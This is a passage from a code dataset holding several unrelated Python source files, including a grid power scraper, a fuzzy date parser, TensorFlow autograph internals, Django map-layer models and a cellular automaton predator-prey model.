cv2.COLOR_BGR2RGB\r\n col = cv2.cvtColor(image, conv)\r\n shape = (self.ip_shape[3], self.ip_shape[2])\r\n res = cv2.resize(col, shape)\r\n x = np.expand_dims(res,axis=0)\r\n array = (0,3,1,2)\r\n p_img = np.transpose(x, array)\r\n return p_img\r\n \r\n\r\n def preprocess_output(self, outputs):\r\n '''\r\n Processes the model output before it is used downstream\r\n '''\r\n outs = outputs[self.op_name][0]\r\n left_x, left_y = outs[0].tolist()[0][0], outs[1].tolist()[0][0]\r\n right_x, right_y = outs[2].tolist()[0][0], 
outs[3].tolist()[0][0]\r\n output = (left_x, left_y, right_x, right_y)\r\n return output\r\n","repo_name":"Dhananjayyy/computer-pointer-controller-using-intel-openvino","sub_path":"src/facial_landmark_detection.py","file_name":"facial_landmark_detection.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33740106688","text":"from pyswip import Prolog\nfrom datetime import date\n\n\nclass Engine:\n\n \"\"\"\n A minimal parser for Multilingual Incomplete & Abbreviated Dates\n \"\"\"\n\n def __init__(self, context=date.today()):\n self.context = context.strftime('date(%Y,%m,%d)')\n self.prolog = Prolog()\n next(self.prolog.query(\"use_module(library(abbreviated_dates))\"))\n\n def when(self, time_expression: str):\n \"\"\"\n Explore all possible solutions\n :param time_expression: a time expression in a natural language\n :return: a solution or an empty list\n \"\"\"\n escaped_quotes = time_expression.replace(\"'\", \"''\")\n query = self.prolog.query(f\"parse({self.context}, '{escaped_quotes}', Date, Trace)\")\n return next(iter([self.transform(solution) for solution in query]), ([], []))\n\n @staticmethod\n def transform(solution):\n semantic = [eval(period.value, {'date': date}) for period in solution[\"Date\"]]\n syntax = [trace.value for trace in solution[\"Trace\"]]\n return semantic, syntax\n","repo_name":"open-engines/fuzzy_dates","sub_path":"fuzzy_parser/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19002080955","text":"#!/usr/bin/env python3\n\n# Code generously borrowed from https://github.com/hectorespert/electricitymap/blob/master/parsers/IN_KA.py\n\nfrom requests import Session\nimport helper_methods\nimport pymysql\nimport os\n\n\ndef fetch_production_by_generator(session):\n html = helper_methods.get_response_soup('http://kptclsldc.com/StateGen.aspx', session)\n\n india_date_time = helper_methods.read_datetime_from_span_id(html, 'lbldate', 'M/D/YYYY h:mm:ss A')\n\n generation = {}\n\n generation['timestamp'] = india_date_time.datetime\n\n # RTPS Production: https://en.wikipedia.org/wiki/Raichur_Thermal_Power_Station\n rtps_value = helper_methods.read_value_from_span_id(html, 'lblrtptot')\n generation['rtps_generation'] = rtps_value\n\n # BTPS Production: https://en.wikipedia.org/wiki/Bellary_Thermal_Power_station\n btps_value = helper_methods.read_value_from_span_id(html, 'lblbtptot')\n generation['btps_generation'] = btps_value\n\n # YTPS Production: https://en.wikipedia.org/wiki/Yermarus_Thermal_Power_Station\n ytps_value = helper_methods.read_value_from_span_id(html, 'ytptot')\n generation['ytps_generation'] = ytps_value\n\n # UPCL Production: https://en.wikipedia.org/wiki/Udupi_Power_Plant\n upcl_value = helper_methods.read_value_from_span_id(html, 'lblupctot')\n generation['upcl_generation'] = upcl_value\n\n # JINDAL Production: https://en.wikipedia.org/wiki/JSW_Vijayanagar_Power_Station\n jindal_value = helper_methods.read_value_from_span_id(html, 'lbljintot')\n generation['jindal_generation'] = jindal_value\n\n # Coal Production\n coal_value = rtps_value + btps_value + ytps_value + upcl_value + jindal_value\n generation['thermal_generation'] = coal_value\n\n # Sharavati Production: Sharavati Hydroelectric\n sharavati_value = helper_methods.read_value_from_span_id(html, 'lblshvytot')\n 
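preprocess_input above follows the usual OpenVINO NCHW pipeline: BGR to RGB, resize to the network's input shape, then HWC to NCHW with a batch axis. An equivalent standalone sketch (the 48x48 shape is illustrative, not the model's actual input size):

import cv2
import numpy as np

def preprocess(image_bgr, n=1, c=3, h=48, w=48):
    rgb = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
    resized = cv2.resize(rgb, (w, h))       # cv2.resize takes (width, height)
    chw = np.transpose(resized, (2, 0, 1))  # HWC -> CHW
    return chw.reshape(n, c, h, w)          # add the batch axis

frame = np.zeros((120, 160, 3), dtype=np.uint8)
assert preprocess(frame).shape == (1, 3, 48, 48)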
generation['sharavati_generation'] = sharavati_value\n\n # Nagjhari Production: Kalinadi-Nagjhari Hydroelectric\n nagjhari_value = helper_methods.read_value_from_span_id(html, 'lblngjtot')\n generation['nagjhari_generation'] = nagjhari_value\n\n # Varahi Production: https://en.wikipedia.org/wiki/Varahi_River#Varahi_Hydro-electric_Project\n varahi_value = helper_methods.read_value_from_span_id(html, 'lblvrhtot')\n generation['varahi_generation'] = varahi_value\n\n # Kodsalli Production: Kalinadi Kodasalli Hydroelectric\n kodsalli_value = helper_methods.read_value_from_span_id(html, 'lblkdsltot')\n generation['kodsalli_generation'] = kodsalli_value\n\n # Kadra Production: https://en.wikipedia.org/wiki/Kadra_Dam\n kadra_value = helper_methods.read_value_from_span_id(html, 'lblkdrtot')\n generation['kadra_generation'] = kadra_value\n\n # GERUSOPPA production: Gerusoppa Dam\n gerusoppa_value = helper_methods.read_value_from_span_id(html, 'lblgrsptot')\n generation['gerusoppa_generation'] = gerusoppa_value\n\n # JOG production: https://en.wikipedia.org/wiki/Jog_Falls\n jog_value = helper_methods.read_value_from_span_id(html, 'lbljogtot')\n generation['jog_generation'] = jog_value\n\n # LPH Production: Linganamakki Dam\n lph_value = helper_methods.read_value_from_span_id(html, 'lbllphtot')\n generation['lph_generation'] = lph_value\n\n # Supa generation: https://en.wikipedia.org/wiki/Supa_Dam\n supa_value = helper_methods.read_value_from_span_id(html, 'lblsupatot')\n generation['supa_generation'] = supa_value\n\n # SHIMSHA: https://en.wikipedia.org/wiki/Shimsha#Power_generation\n shimsha_value = helper_methods.read_value_from_span_id(html, 'lblshimtot')\n generation['shimsha_generation'] = shimsha_value\n\n # SHIVASAMUDRA: https://en.wikipedia.org/wiki/Shivanasamudra_Falls#Power_generation\n shivasamudra_value = helper_methods.read_value_from_span_id(html, 'lblshivtot')\n generation['shivasamudra_generation'] = shivasamudra_value\n\n # MANIDAM: Mani Dam Hydroelectric\n manidam_value = helper_methods.read_value_from_span_id(html, 'lblmanitot')\n generation['manidam_generation'] = manidam_value\n\n # MUNRABAD: Munirabad Hydroelectric\n munrabad_value = helper_methods.read_value_from_span_id(html, 'lblmbdtot')\n generation['munrabad_generation'] = munrabad_value\n\n # BHADRA: https://en.wikipedia.org/wiki/Bhadra_Dam\n bhadra_value = helper_methods.read_value_from_span_id(html, 'lblbdratot')\n generation['bhadra_generation'] = bhadra_value\n\n # GHATAPRABHA: Ghataprabha Hydroelectric\n ghataprabha_value = helper_methods.read_value_from_span_id(html, 'lblgtprtot')\n generation['ghataprabha_generation'] = ghataprabha_value\n\n # ALMATTI: https://en.wikipedia.org/wiki/Almatti_Dam\n almatti_value = helper_methods.read_value_from_span_id(html, 'lblalmttot')\n generation['almatti_generation'] = almatti_value\n\n # CGS (Central Generating Stations) Production\n # TODO: Search CGS production type\n cgs_value = helper_methods.read_value_from_span_id(html, 'lblcgs')\n generation['cgs_generation'] = cgs_value\n\n ncep_value = helper_methods.read_value_from_span_id(html, 'lblncep')\n generation['ncep_generation'] = ncep_value\n\n total_value = helper_methods.read_value_from_span_id(html, 'lbltotgen')\n generation['total_generation'] = total_value\n\n frequency_value = helper_methods.read_value_from_span_id(html, 'lblfreq')\n generation['frequency_hz'] = frequency_value\n\n # Hydro production\n hydro_value = sharavati_value + nagjhari_value + varahi_value + kodsalli_value \\\n + kadra_value + gerusoppa_value + 
jog_value + lph_value + supa_value \\\n + shimsha_value + shivasamudra_value + manidam_value + munrabad_value \\\n + bhadra_value + ghataprabha_value + almatti_value\n generation['hydro_generation'] = hydro_value\n\n return generation\n\n\ndef fetch_ncep_production(session):\n ncep_generation = {}\n\n # NCEP (Non-Conventional Energy Production)\n ncep_html = helper_methods.get_response_soup('http://kptclsldc.com/StateNCEP.aspx', session)\n ncep_date_time = helper_methods.read_datetime_from_span_id(ncep_html, 'Label1', 'DD/MM/YYYY HH:mm:ss')\n\n ncep_generation['timestamp'] = ncep_date_time.datetime\n\n # cogen type is sugarcane bagasee. Proof in Issue #1867\n cogen_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_tc')\n ncep_generation['cogen_generation'] = cogen_value\n\n biomass_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_tb')\n ncep_generation['biomass_generation'] = biomass_value\n\n # cogen_value is generated from sugarcane bagasse\n biomass_value += cogen_value\n\n mini_hydro_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_tm')\n ncep_generation['mini_hydro_generation'] = mini_hydro_value\n\n wind_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_tw')\n ncep_generation['wind_generation'] = wind_value\n\n solar_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_ts')\n ncep_generation['solar_generation'] = solar_value\n\n return ncep_generation\n\n\ndef fetch_escom_demand(session):\n escom_demand = {}\n\n # ESCOM Scheduled & Actual\n escom_html = helper_methods.get_response_soup('http://kptclsldc.com/Snapshot.aspx', session)\n escom_date_time = helper_methods.read_datetime_from_span_id(escom_html, 'Label6', 'DD/MM/YYYY HH:mm:ss')\n\n escom_demand['timestamp'] = escom_date_time.datetime\n\n scheduled_bescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label15')\n actual_bescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label10')\n escom_demand['scheduled_bescom_load'] = scheduled_bescom_load\n escom_demand['actual_bescom_load'] = actual_bescom_load\n\n scheduled_mescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label16')\n actual_mescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label11')\n escom_demand['scheduled_mescom_load'] = scheduled_mescom_load\n escom_demand['actual_mescom_load'] = actual_mescom_load\n\n scheduled_cesc_load = helper_methods.read_value_from_span_id(escom_html, 'Label17')\n actual_cesc_load = helper_methods.read_value_from_span_id(escom_html, 'Label12')\n escom_demand['scheduled_cesc_load'] = scheduled_cesc_load\n escom_demand['actual_cesc_load'] = actual_cesc_load\n\n scheduled_gescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label18')\n actual_gescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label13')\n escom_demand['scheduled_gescom_load'] = scheduled_gescom_load\n escom_demand['actual_gescom_load'] = actual_gescom_load\n\n scheduled_hescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label19')\n actual_hescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label14')\n escom_demand['scheduled_hescom_load'] = scheduled_hescom_load\n escom_demand['actual_hescom_load'] = actual_hescom_load\n\n scheduled_total_load = helper_methods.read_value_from_span_id(escom_html, 'Label25')\n actual_total_load = helper_methods.read_value_from_span_id(escom_html, 'Label26')\n escom_demand['scheduled_total_load'] = scheduled_total_load\n escom_demand['actual_total_load'] = 
actual_total_load\n\n frequency_value = helper_methods.read_value_from_span_id(escom_html, 'Label1')\n escom_demand['frequency_hz'] = frequency_value\n\n return escom_demand\n\n\ndef fetch_data(session=None, conn=None, target_datetime=None, logger=None):\n cursor = conn.cursor()\n\n try:\n generation = fetch_production_by_generator(session)\n helper_methods.insert_into_table('kptcl_generation', generation, cursor, conn)\n except Exception as e:\n print(f'Could not fetch kptcl generation data: {e}')\n\n try:\n ncep_generation = fetch_ncep_production(session)\n helper_methods.insert_into_table('kptcl_ncep_generation', ncep_generation, cursor, conn)\n except Exception as e:\n print(f'Could not fetch kptcl ncep generation data: {e}')\n\n try:\n escom_demand = fetch_escom_demand(session)\n helper_methods.insert_into_table('kptcl_load', escom_demand, cursor, conn)\n except Exception as e:\n print(f'Could not fetch kptcl load data: {e}')\n\n\ndef run():\n session = Session()\n host = os.environ['HOST']\n port = int(os.environ['PORT'])\n dbname = os.environ['DB']\n user = os.environ['USER']\n password = os.environ['PASSWORD']\n conn = pymysql.connect(host, user=user, port=port,\n passwd=password, db=dbname)\n fetch_data(session, conn)\n\n\ndef lambda_handler(event, context):\n run()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"utkarshdalal/brookings_data_scrapers","sub_path":"kptcl_scraper.py","file_name":"kptcl_scraper.py","file_ext":"py","file_size_in_byte":10600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10188715465","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\n\nimport gast\nimport six\n\nfrom tensorflow.contrib.autograph.pyct import anno\nfrom tensorflow.contrib.autograph.pyct import compiler\nfrom tensorflow.contrib.autograph.pyct import pretty_printer\n\n\nclass AutographParseError(SyntaxError):\n pass\n\n\ndef try_ast_to_source(node):\n try:\n return compiler.ast_to_source(node)\n except AssertionError:\n return ''\n\n\nclass Base(gast.NodeTransformer):\n \"\"\"Base class for specialized transformers.\n\n Scope-local state tracking: to keep state across nodes, at the level of\n (possibly nested) scopes, use enter/exit_local_scope and set/get_local.\n You must call enter/exit_local_scope manually, but the transformer detects\n when they are not properly paired.\n \"\"\"\n\n def __init__(self, context):\n \"\"\"Initialize the transformer. Subclasses should call this.\n\n Args:\n context: An EntityContext.\n \"\"\"\n self._lineno = 0\n self._col_offset = 0\n self.context = context\n self._enclosing_entities = []\n\n # A stack that allows keeping mutable, scope-local state where scopes may be\n # nested. 
For example, it can be used to track the usage of break\n    # statements in each loop, where loops may be nested.\n    self._local_scope_state = []\n    self.enter_local_scope()\n\n  @property\n  def enclosing_entities(self):\n    return tuple(self._enclosing_entities)\n\n  @property\n  def local_scope_level(self):\n    return len(self._local_scope_state)\n\n  def enter_local_scope(self):\n    self._local_scope_state.append({})\n\n  def exit_local_scope(self):\n    return self._local_scope_state.pop()\n\n  def set_local(self, name, value):\n    self._local_scope_state[-1][name] = value\n\n  def get_local(self, name, default=None):\n    return self._local_scope_state[-1].get(name, default)\n\n  def debug_print(self, node):\n    \"\"\"Helper method useful for debugging.\"\"\"\n    if __debug__:\n      print(pretty_printer.fmt(node))\n    return node\n\n  def visit_block(self, nodes):\n    \"\"\"Helper equivalent to generic_visit, but for node lists.\"\"\"\n    results = []\n    for node in nodes:\n      replacement = self.visit(node)\n      if replacement:\n        if isinstance(replacement, (list, tuple)):\n          results.extend(replacement)\n        else:\n          results.append(replacement)\n    return results\n\n  def visit(self, node):\n    source_code = self.context.source_code\n    source_file = self.context.source_file\n    did_enter_function = False\n    local_scope_state_size = len(self._local_scope_state)\n\n    try:\n      if isinstance(node, (gast.FunctionDef, gast.ClassDef, gast.Lambda)):\n        self._enclosing_entities.append(node)\n        did_enter_function = True\n\n      if source_code and hasattr(node, 'lineno'):\n        self._lineno = node.lineno\n        self._col_offset = node.col_offset\n      if anno.hasanno(node, anno.Basic.SKIP_PROCESSING):\n        return node\n      return super(Base, self).visit(node)\n\n    except (ValueError, AttributeError, KeyError, NotImplementedError,\n            AssertionError) as e:\n      msg = '%s: %s\\nOffending source:\\n%s\\n\\nOccurred at node:\\n%s' % (\n          e.__class__.__name__, str(e), try_ast_to_source(node),\n          pretty_printer.fmt(node, color=False))\n      if source_code:\n        line = source_code.splitlines()[self._lineno - 1]\n      else:\n        line = ''\n      six.reraise(AutographParseError,\n                  AutographParseError(\n                      msg,\n                      (source_file, self._lineno, self._col_offset + 1, line)),\n                  sys.exc_info()[2])\n    finally:\n      if did_enter_function:\n        self._enclosing_entities.pop()\n\n      if local_scope_state_size != len(self._local_scope_state):\n        raise AssertionError(\n            'Inconsistent local scope stack. Before entering node %s, the'\n            ' stack had length %d, after exit it has length %d. 
This'\n            ' indicates enter_local_scope and exit_local_scope are not'\n            ' well paired.' % (node, local_scope_state_size, len(self._local_scope_state)))\n","repo_name":"miglopst/cs263_spring2018","sub_path":"tensorflow/contrib/autograph/pyct/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"27183702379","text":"from .models import Cart, Cart_item\nfrom .views import my_cart\n\n\ndef counter(request):\n    count = 0\n    if 'admin' in request.path:\n        return {}\n    else:\n        try:\n            cart = Cart.objects.filter(cart_id=my_cart(request))\n            cart_items = Cart_item.objects.all().filter(cart=cart[:1])\n            for cart_item in cart_items:\n                count += cart_item.quantity\n        except Cart.DoesNotExist:\n            count = 0\n    return dict(count=count)\n","repo_name":"ajith0208/Ecommerce_Project","sub_path":"ecommerce/cart/Context_Processors.py","file_name":"Context_Processors.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25478016414","text":"# -*- coding: utf-8 -*-\n# This technical data was produced for the U. S. Government under Contract No. W15P7T-13-C-F600, and\n# is subject to the Rights in Technical Data-Noncommercial Items clause at DFARS 252.227-7013 (FEB 2012)\n\n\nimport json\nfrom django.contrib.gis.db import models\nfrom geoevents.taggit.managers import TaggableManager\nfrom datetime import datetime\n\nIMAGE_FORMATS = (\n    ('image/png', 'image/png'),\n    ('image/png8', 'image/png8'),\n    ('image/jpeg', 'image/jpeg'),\n    ('image/gif', 'image/gif'),\n    ('image/tiff', 'image/tiff'),\n    ('image/tiff8', 'image/tiff8'),\n    ('image/geotiff', 'image/geotiff'),\n    ('image/geotiff8', 'image/geotiff8'),\n    ('image/svg', 'image/svg'),\n    ('rss', 'rss'),\n    ('kml', 'kml'),\n    ('kmz', 'kmz'),\n    ('json', 'json'),\n    ('png', 'png'),\n    ('png8', 'png8'),\n    ('jpeg', 'jpeg'),\n    ('jpg', 'jpg'),\n    ('gif', 'gif'),\n    ('tiff', 'tiff'),\n    ('tiff8', 'tiff8'),\n    ('geotiff', 'geotiff'),\n    ('geotiff8', 'geotiff8'),\n    ('svg', 'svg'),\n)\n\nSERVICE_TYPES = (\n    ('ArcGIS93Rest', 'ArcGIS93Rest'),\n    ('WMS', 'WMS'),\n    ('KML', 'KML'),\n    ('GeoRSS', 'GeoRSS'),\n    ('GeoJSON', 'GeoJSON'),\n    ('GPX', 'GPX'),\n    ('GML', 'GML'),\n    ('WMTS', 'WMTS'),\n    ('MapBox', 'MapBox'),\n    ('TileServer', 'TileServer'),\n    ('GetCapabilities', 'GetCapabilities'),\n)\n\nMAP_CATEGORIES = [(n, n) for n in sorted(\n    ['Human Geography', 'Hurricanes', 'Floods', 'Earthquakes', 'Fires', 'Volcanoes', 'Tsunami', 'Infrastructure',\n     'Event-Specific', 'Disease'])]\nINFO_FORMATS = [(n, n) for n in sorted(\n    ['application/vnd.ogc.wms_xml', 'application/xml', 'text/html', 'text/plain', 'application/json'])]\n\nPARSER_CATEGORIES = (\n    ('palanterra', 'palanterra'),\n    ('uscg_ships', 'uscg_ships'),\n    ('icnet', 'icnet'),\n    ('dg_wmts_time', 'dg_wmts_time'),\n    ('geomedia_triaged', 'geomedia_triaged'),\n    ('harvester_earthquake', 'harvester_earthquake'),\n    ('harvester_fire', 'harvester_fire'),\n    ('harvester_tsunami', 'harvester_tsunami'),\n    ('harvester_flood', 'harvester_flood'),\n    ('harvester_volcano', 'harvester_volcano'),\n    ('ima', 'ima'),\n)\n\n\nclass Layer(models.Model):\n    \"\"\"\n    A layer object that can be added to any map.\n    \"\"\"\n\n    name = models.CharField(max_length=200)\n    type = models.CharField(choices=SERVICE_TYPES, max_length=75)\n    url = models.URLField(max_length=600,\n                          help_text='URL of service. If WMS, can be any valid URL. 
Otherwise, the URL will require a local proxy and Firewall change to access it')\n layer = models.CharField(max_length=800, null=True, blank=True,\n help_text='The layer name from the GetCapabilities document. Many ESRI servers have just \"0\" or \"1\" for layers names. Layer names can sometimes be comma-separated (\"0,1,2\"), and are not needed for data layers such as KML, GeoRSS, GeoJSON..')\n image_format = models.CharField(null=True, blank=True, choices=IMAGE_FORMATS, max_length=75,\n help_text='The MIME type of the image format to use for tiles on WMS layers (image/png, image/jpeg image/gif...). Double check that the server exposes this exactly - some servers push png instead of image/png.')\n tags = TaggableManager(blank=True, help_text='Tags to help search for layers')\n description = models.TextField(max_length=800, null=True, blank=True,\n help_text='Text to show in layer chooser, please be descriptive - this will soon be searchable')\n attribution = models.CharField(max_length=200, null=True, blank=True,\n help_text=\"Attribution from layers to the map display (will show in bottom of map when layer is visible).\")\n\n ## Advanced layer options\n objects = models.GeoManager()\n category = models.CharField(max_length=50, null=True, blank=True, choices=MAP_CATEGORIES,\n help_text='Categories that will be used to organize map layers that users can add to map from the Layers button')\n styles = models.CharField(null=True, blank=True, max_length=200,\n help_text='The name of a style to use for this layer (only useful for WMS layers if the server exposes it.)')\n transparent = models.BooleanField(default=True,\n help_text='If WMS or overlay, should the tiles be transparent where possible?')\n refreshrate = models.PositiveIntegerField(\n help_text='Layer refresh rate in seconds for vector/data layers (will not refresh WMS layers)',\n verbose_name=\"Layer Refresh Rate\", blank=True, null=True)\n token = models.CharField(max_length=400, null=True, blank=True,\n help_text='Authentication token, if required (usually only for secure layer servers)')\n created_at = models.DateTimeField(default=datetime.now, blank=True)\n updated_at = models.DateTimeField(auto_now=True, blank=True, null=True)\n\n show_in_table = models.BooleanField(default=True,\n help_text=\"Draw a table on the Event Pages with any info found from results.\")\n allow_image_modifications = models.BooleanField(default=False,\n help_text=\"Allow the user to change Brightness, Sharpness, etc on layer - requires that the server can proxy to the source server and thus Firewall might need to be opened.\")\n extent = models.PolygonField(null=True, blank=True, help_text='Extent of the layer.')\n layer_parsing_function = models.CharField(max_length=100, blank=True, null=True, choices=PARSER_CATEGORIES,\n help_text='Advanced - The javascript function used to parse a data service (GeoJSON, GeoRSS, KML), needs to be an internally known parser. Contact an admin if you need data parsed in a new way.')\n enable_identify = models.BooleanField(default=False,\n help_text='Advanced - Allow user to click map to query layer for details. The map server must support queries for this layer.')\n info_format = models.CharField(max_length=75, null=True, blank=True, choices=INFO_FORMATS,\n help_text='Advanced - what format the server returns for an WMS-I query')\n root_field = models.CharField(max_length=100, null=True, blank=True,\n help_text='Advanced - For WMS-I (queryable) layers, the root field returned by server. 
Leave blank for default (will usually be \"FIELDS\" in returned XML).')\n fields_to_show = models.CharField(max_length=200, null=True, blank=True,\n help_text='Fields to show when someone uses the identify tool to click on the layer. Leave blank for all.')\n downloadableLink = models.URLField(max_length=300, null=True, blank=True,\n help_text='URL of link to supporting tool (such as a KML document that will be shown as a download button)')\n layer_params = models.TextField(null=True, blank=True,\n help_text='JSON key/value pairs to be sent to the web service. Use double-quotes around both the key and value for JSON. ex: {\"crs\":\"urn:ogc:def:crs:EPSG::4326\"}')\n spatial_reference = models.CharField(max_length=32, blank=True, null=True, default=\"EPSG:4326\",\n help_text='The spatial reference of the service. Should be in ESPG:XXXX format.')\n constraints = models.TextField(null=True, blank=True)\n\n ## Primarily for http://trac.osgeo.org/openlayers/wiki/OpenLayersOptimization\n additional_domains = models.TextField(null=True, blank=True,\n help_text='Semicolon seperated list of additional domains for the layer.')\n\n\n ## Not yet implemented\n min_scale = models.FloatField(null=True, blank=True)\n max_scale = models.FloatField(null=True, blank=True,\n help_text='Not yet implemented - Used for Zoom to Layer operation.')\n source_params = models.TextField(null=True, blank=True,\n help_text='Not yet implemented - Options to pass into layer builder')\n\n def __unicode__(self):\n return '{0}'.format(self.name)\n\n def tags_as_list(self):\n \"\"\"\n Returns the layer's tags.\n \"\"\"\n return self.tags.all()\n\n def get_layer_urls(self):\n \"\"\"\n Returns a list of urls for the layer.\n \"\"\"\n urls = [self.url]\n\n if getattr(self, 'additional_domains'):\n map(urls.append, (domain for domain in self.additional_domains.split(\";\") if domain))\n\n return urls\n\n def get_layer_params(self):\n \"\"\"\n Converts a layer's parameters to json.\n \"\"\"\n try:\n params = json.loads(self.layer_params)\n\n except:\n params = dict()\n\n model_fields = [field.name for field in self._meta.fields if field.name in params.keys()]\n\n for key in model_fields:\n if self.__getattribute__(key):\n params.pop(key)\n\n return params\n\n class Meta:\n ordering = [\"name\"]\n\n\nclass Map(models.Model):\n \"\"\"\n A Map aggregates several layers together.\n \"\"\"\n\n title = models.CharField(max_length=75, unique=True)\n description = models.TextField(max_length=800, blank=True, null=True)\n zoom = models.IntegerField(help_text='Sets the default zoom level of the map.')\n projection = models.CharField(max_length=32, blank=True, null=True, default=\"EPSG:4326\",\n help_text='Set the default projection for layers added to this map. Note that the projection of the map is usually determined by that of the current baseLayer')\n center_x = models.FloatField(default=0.0,\n help_text='Sets the center x coordinate of the map. Maps on event pages default to the location of the event.')\n center_y = models.FloatField(default=0.0,\n help_text='Sets the center y coordinate of the map. 
Maps on event pages default to the location of the event.')\n created = models.DateTimeField(auto_now_add=True)\n last_updated = models.DateTimeField(auto_now_add=True)\n tags = TaggableManager(blank=True)\n\n def __unicode__(self):\n return '{0}'.format(self.title)\n\n @property\n def center(self):\n \"\"\"\n A handy shortcut for the center_x and center_y properties as a tuple\n (read only)\n \"\"\"\n return (self.center_x, self.center_y)\n\n @property\n def layers(self):\n layers = MapLayer.objects.filter(map=self.id)\n return [layer for layer in layers]\n\n def map_layers_json(self):\n def layer_json(map_layer):\n return {\n \"id\": map_layer.layer.id,\n \"name\": map_layer.layer.name,\n \"format\": map_layer.layer.image_format,\n \"type\": map_layer.layer.type,\n \"url\": map_layer.layer.get_layer_urls(),\n \"layer\": map_layer.layer.layer,\n \"shown\": map_layer.shown,\n \"transparent\": map_layer.layer.transparent,\n \"show_in_table\": map_layer.layer.show_in_table,\n \"allow_image_modifications\": map_layer.layer.allow_image_modifications,\n \"opacity\": map_layer.opacity,\n \"layerParams\": map_layer.layer.get_layer_params(),\n \"sourceParams\": map_layer.layer.source_params,\n \"isBaseLayer\": map_layer.is_base_layer,\n \"displayInLayerSwitcher\": map_layer.display_in_layer_switcher,\n \"refreshrate\": map_layer.layer.refreshrate,\n \"token\": map_layer.layer.token,\n \"category\": map_layer.layer.category,\n \"attribution\": map_layer.layer.attribution,\n \"spatialReference\": map_layer.layer.spatial_reference,\n \"layerParsingFunction\": map_layer.layer.layer_parsing_function,\n \"minScale\": map_layer.layer.min_scale,\n \"maxScale\": map_layer.layer.max_scale,\n \"enableIdentify\": map_layer.layer.enable_identify,\n \"rootField\": map_layer.layer.root_field,\n \"infoFormat\": map_layer.layer.info_format,\n \"fieldsToShow\": map_layer.layer.fields_to_show,\n \"description\": map_layer.layer.description,\n \"downloadableLink\": map_layer.layer.downloadableLink,\n \"tags\": [n.name for n in map_layer.layer.tags_as_list()],\n \"styles\": map_layer.layer.styles,\n }\n\n map_services = []\n for map_layer in self.layers:\n map_services.append(layer_json(map_layer))\n\n return json.dumps(map_services)\n\n def map_json(self):\n return json.dumps({\n \"center_x\": self.center_x,\n \"center_y\": self.center_y,\n \"zoom\": self.zoom,\n \"projection\": self.projection or \"EPSG:4326\",\n })\n\n\nclass MapLayer(models.Model):\n \"\"\"\n The MapLayer is the mechanism that joins a Layer to a Map and allows for custom look and feel.\n \"\"\"\n\n map = models.ForeignKey(Map, related_name='map_set')\n layer = models.ForeignKey(Layer, related_name='map_layer_set')\n shown = models.BooleanField(default=True)\n stack_order = models.IntegerField()\n opacity = models.FloatField(default=.80)\n is_base_layer = models.BooleanField(\n help_text=\"Base Layers are mutually exclusive layers, meaning only one can be enabled at any given time. 
The currently active base layer determines the available projection (coordinate system) and zoom levels available on the map.\")\n display_in_layer_switcher = models.BooleanField()\n\n class Meta:\n ordering = [\"stack_order\"]\n\n def __unicode__(self):\n return 'Layer {0}: {1}'.format(self.stack_order, self.layer)","repo_name":"ngageoint/geoevents","sub_path":"geoevents/maps/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13968,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"61"} +{"seq_id":"27647364357","text":"from ModelMain import Model, ModelException\r\nfrom Utils import lerp\r\nimport numpy as np\r\nimport math\r\nimport random\r\n\r\n\r\n# An implementation of the CA model described in the PWS\r\nclass CAModel(Model):\r\n # shape: a tuple giving the width, height, depth, etc. of the grid\r\n # num_runs: amount of runs the average is taken over\r\n def __init__(self, shape, num_runs, max_t, N, steps_per_time_is_parameter=True,\r\n x_factor_is_parameter=True, y_factor_is_parameter=True,\r\n steps_per_time=None, x_factor=None, y_factor=None):\r\n self.shape = shape\r\n self.num_runs = num_runs\r\n self.max_t = max_t\r\n self.N = N\r\n self.steps_per_time_is_parameter = steps_per_time_is_parameter\r\n self.x_factor_is_parameter = x_factor_is_parameter\r\n self.y_factor_is_parameter = y_factor_is_parameter\r\n self.steps_per_time = steps_per_time\r\n self.x_factor = x_factor\r\n self.y_factor = y_factor\r\n\r\n def get_prediction(self, parameters: dict, x0: float, y0: float):\r\n num_cells = math.prod(self.shape)\r\n steps_per_time = parameters[\"steps_per_time\"] if self.steps_per_time_is_parameter else self.steps_per_time\r\n x_factor = parameters[\"x_factor\"] if self.x_factor_is_parameter else self.x_factor\r\n y_factor = parameters[\"y_factor\"] if self.y_factor_is_parameter else self.y_factor\r\n num_steps = math.ceil(self.max_t*steps_per_time)\r\n\r\n # compute chances for each cell to be a predator or a prey animal in the initial grid\r\n x_chance = x0/x_factor\r\n y_chance = y0/y_factor\r\n\r\n result = np.zeros((num_steps, 2), dtype=float)\r\n\r\n for i in range(self.num_runs):\r\n num_x = 0\r\n num_y = 0\r\n random_grid = np.random.rand(*self.shape)\r\n grid = np.random.randint(0, 3, self.shape, int)\r\n # loop through all points\r\n it = np.nditer(random_grid, flags=[\"multi_index\"])\r\n while not it.finished:\r\n value = random_grid[it.multi_index]\r\n if value < x_chance:\r\n 